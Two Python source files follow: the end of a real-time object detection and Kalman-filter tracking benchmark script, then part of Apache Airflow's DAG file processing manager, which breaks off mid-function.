batch_kf_predict_only, batch_kf_predict, \
batch_kf_update
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--data-root', type=str, required=True)
parser.add_argument('--annot-path', type=str, required=True)
parser.add_argument('--fps', type=float, default=30)
parser.add_argument('--eta', type=float, default=0, help='eta >= -1') # frame
parser.add_argument('--config', type=str, required=True)
parser.add_argument('--weights', type=str, required=True)
parser.add_argument('--in-scale', type=float, default=None)
parser.add_argument('--no-mask', action='store_true', default=False)
parser.add_argument('--cpu-pre', action='store_true', default=False)
parser.add_argument('--dynamic-schedule', action='store_true', default=False)
parser.add_argument('--runtime', type=str, required=True)
parser.add_argument('--perf-factor', type=float, default=1)
parser.add_argument('--match-iou-th', type=float, default=0.3)
parser.add_argument('--forecast-rt-ub', type=float, default=0.003) # seconds
parser.add_argument('--out-dir', type=str, required=True)
parser.add_argument('--overwrite', action='store_true', default=False)
opts = parser.parse_args()
return opts
def det_process(opts, frame_recv, det_res_send, w_img, h_img):
try:
model = init_detector(opts)
# warm up the GPU
_ = inference_detector(model, np.zeros((h_img, w_img, 3), np.uint8))
torch.cuda.synchronize()
while 1:
fidx = frame_recv.recv()
if type(fidx) is list:
# new video, read all images in advance
frame_list = fidx
frames = [imread(img_path) for img_path in frame_list]
# signal ready, no errors
det_res_send.send('ready')
continue
elif fidx is None:
# exit flag
break
fidx, t1 = fidx
img = frames[fidx]
t2 = perf_counter()
t_send_frame = t2 - t1
result = inference_detector(model, img, gpu_pre=not opts.cpu_pre)
torch.cuda.synchronize()
t3 = perf_counter()
det_res_send.send([result, t_send_frame, t3])
except Exception:
# report all errors from the child process to the parent
# forward traceback info as well
det_res_send.send(Exception("".join(traceback.format_exception(*sys.exc_info()))))
def main():
assert torch.cuda.device_count() == 1 # mmdet only supports single GPU testing
opts = parse_args()
mkdir2(opts.out_dir)
db = COCO(opts.annot_path)
class_names = [c['name'] for c in db.dataset['categories']]
n_class = len(class_names)
coco_mapping = db.dataset.get('coco_mapping', None)
if coco_mapping is not None:
coco_mapping = np.asarray(coco_mapping)
seqs = db.dataset['sequences']
seq_dirs = db.dataset['seq_dirs']
img = db.imgs[0]
w_img, h_img = img['width'], img['height']
mp.set_start_method('spawn')
frame_recv, frame_send = mp.Pipe(False)
det_res_recv, det_res_send = mp.Pipe(False)
det_proc = mp.Process(target=det_process, args=(opts, frame_recv, det_res_send, w_img, h_img))
det_proc.start()
if opts.dynamic_schedule:
runtime = pickle.load(open(opts.runtime, 'rb'))
runtime_dist = dist_from_dict(runtime, opts.perf_factor)
mean_rtf = runtime_dist.mean()*opts.fps
n_total = 0
t_det_all = []
t_send_frame_all = []
t_recv_res_all = []
t_assoc_all = []
t_forecast_all = []
with torch.no_grad():
kf_F = torch.eye(8)
kf_Q = torch.eye(8)
kf_R = 10*torch.eye(4)
kf_P_init = 100*torch.eye(8).unsqueeze(0)
for sid, seq in enumerate(tqdm(seqs)):
frame_list = [img for img in db.imgs.values() if img['sid'] == sid]
frame_list = [join(opts.data_root, seq_dirs[sid], img['name']) for img in frame_list]
n_frame = len(frame_list)
n_total += n_frame
timestamps = []
results_parsed = []
input_fidx = []
processing = False
fidx_t2 = None # detection input index at t2
fidx_latest = None
tkidx = 0 # track starting index
kf_x = torch.empty((0, 8, 1))
kf_P = torch.empty((0, 8, 8))
n_matched12 = 0
# let detector process to read all the frames
frame_send.send(frame_list)
# it is possible that unfetched results remain in the pipe
while 1:
msg = det_res_recv.recv() # wait till the detector is ready
if msg == 'ready':
break
elif isinstance(msg, Exception):
raise msg
t_total = n_frame/opts.fps
t_unit = 1/opts.fps
t_start = perf_counter()
while 1:
t1 = perf_counter()
t_elapsed = t1 - t_start
if t_elapsed >= t_total:
break
# identify latest available frame
fidx_continous = t_elapsed*opts.fps
fidx = int(np.floor(fidx_continous))
if fidx == fidx_latest:
# algorithm is fast and has some idle time
wait_for_next = True
else:
wait_for_next = False
if opts.dynamic_schedule:
if mean_rtf >= 1:
# when runtime < 1, it should always process every frame
fidx_remainder = fidx_continous - fidx
if mean_rtf < np.floor(fidx_remainder + mean_rtf):
# wait till next frame
wait_for_next = True
if wait_for_next:
# sleep
continue
if not processing:
t_start_frame = perf_counter()
frame_send.send((fidx, t_start_frame))
fidx_latest = fidx
processing = True
# wait till query - forecast-rt-ub
wait_time = t_unit - opts.forecast_rt_ub
if det_res_recv.poll(wait_time): # wait
# new result
result = det_res_recv.recv()
if isinstance(result, Exception):
raise result
result, t_send_frame, t_start_res = result
bboxes_t2, scores_t2, labels_t2, _ = \
parse_det_result(result, coco_mapping, n_class)
processing = False
t_det_end = perf_counter()
t_det_all.append(t_det_end - t_start_frame)
t_send_frame_all.append(t_send_frame)
t_recv_res_all.append(t_det_end - t_start_res)
# associate across frames
t_assoc_start = perf_counter()
if len(kf_x):
dt = fidx_latest - fidx_t2
kf_F = make_F(kf_F, dt)
kf_Q = make_Q(kf_Q, dt)
kf_x, kf_P = batch_kf_predict(kf_F, kf_x, kf_P, kf_Q)
bboxes_f = x2bbox(kf_x)
fidx_t2 = fidx_latest
n = len(bboxes_t2)
if n:
# put high scores det first for better iou matching
score_argsort = np.argsort(scores_t2)[::-1]
bboxes_t2 = bboxes_t2[score_argsort]
scores_t2 = scores_t2[score_argsort]
labels_t2 = labels_t2[score_argsort]
ltrb2ltwh_(bboxes_t2)
updated = False
if len(kf_x):
order1, order2, n_matched12, tracks, tkidx = iou_assoc(
bboxes_f, labels, tracks, tkidx,
bboxes_t2, labels_t2, opts.match_iou_th,
no_unmatched1=True,
)
if n_matched12:
kf_x = kf_x[order1]
kf_P = kf_P[order1]
kf_x, kf_P = batch_kf_update(
bbox2z(bboxes_t2[order2[:n_matched12]]),
kf_x,
kf_P,
kf_R,
)
kf_x_new = bbox2x(bboxes_t2[order2[n_matched12:]])
n_unmatched2 = len(bboxes_t2) - n_matched12
kf_P_new = kf_P_init.expand(n_unmatched2, -1, -1)
kf_x = torch.cat((kf_x, kf_x_new))
kf_P = torch.cat((kf_P, kf_P_new))
labels = labels_t2[order2]
scores = scores_t2[order2]
updated = True
if not updated:
# start from scratch
kf_x = bbox2x(bboxes_t2)
kf_P = kf_P_init.expand(len(bboxes_t2), -1, -1)
labels = labels_t2
scores = scores_t2
tracks = np.arange(tkidx, tkidx + n, dtype=np.uint32)
tkidx += n
t_assoc_end = perf_counter()
t_assoc_all.append(t_assoc_end - t_assoc_start)
# apply forecasting for the current query
t_forecast_start = perf_counter()
query_pointer = fidx + opts.eta + 1
if len(kf_x):
dt = (query_pointer - fidx_t2)
kf_x_np = kf_x[:, :, 0].numpy()
bboxes_t3 = kf_x_np[:n_matched12, :4] + dt*kf_x_np[:n_matched12, 4:]
if n_matched12 < len(kf_x):
bboxes_t3 = np.concatenate((bboxes_t3, kf_x_np[n_matched12:, :4]))
bboxes_t3, keep = extrap_clean_up(bboxes_t3, w_img, h_img, lt=True)
labels_t3 = labels[keep]
scores_t3 = scores[keep]
tracks_t3 = tracks[keep]
else:
bboxes_t3 = np.empty((0, 4), dtype=np.float32)
scores_t3 = np.empty((0,), dtype=np.float32)
labels_t3 = np.empty((0,), dtype=np.int32)
tracks_t3 = np.empty((0,), dtype=np.int32)
t_forecast_end = perf_counter()
t_forecast_all.append(t_forecast_end - t_forecast_start)
t3 = perf_counter()
t_elapsed = t3 - t_start
if t_elapsed >= t_total:
break
if len(bboxes_t3):
ltwh2ltrb_(bboxes_t3)
if fidx_t2 is not None:
timestamps.append(t_elapsed)
results_parsed.append((bboxes_t3, scores_t3, labels_t3, None, tracks_t3))
input_fidx.append(fidx_t2)
out_path = join(opts.out_dir, seq + '.pkl')
if opts.overwrite or not isfile(out_path):
pickle.dump({
'results_parsed': results_parsed,
'timestamps': timestamps,
'input_fidx': input_fidx,
}, open(out_path, 'wb'))
# terminates the child process
frame_send.send(None)
out_path = join(opts.out_dir, 'time_info.pkl')
if opts.overwrite or not isfile(out_path):
pickle.dump({
'n_total': n_total,
't_det': t_det_all,
't_send_frame': t_send_frame_all,
't_recv_res': t_recv_res_all,
't_assoc': t_assoc_all,
't_forecast': t_forecast_all,
}, open(out_path, 'wb'))
# convert to ms for display
s2ms = lambda x: 1e3*x
print_stats(t_det_all, 'Runtime detection (ms)', cvt=s2ms)
print_stats(t_send_frame_all, 'Runtime sending the frame (ms)', cvt=s2ms)
print_stats(t_recv_res_all, 'Runtime receiving the result (ms)', cvt=s2ms)
print_stats(t_assoc_all, "Runtime association (ms)", cvt=s2ms)
print_stats(t_forecast_all, "Runtime forecasting (ms)", cvt=s2ms)
if __name__ == '__main__':
main()
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""Detects DAGs which are no longer present in files and deactivate them."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info(f"DAG {dag.dag_id} is missing and will be deactivated.")
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
self.last_deactivate_stale_dags_time = timezone.utcnow()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
maxCallbacksPerLoop = conf.getint("scheduler", "max_callbacks_per_loop")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
if conf.getboolean("scheduler", "standalone_dag_processor"):
# Nothing to do if callbacks are not stored in the database
self._fetch_callbacks(maxCallbacksPerLoop)
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal pipe for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._signal_conn.send(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_files would delete zipped dags.
# Likewise DagCode.remove_deleted_code
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
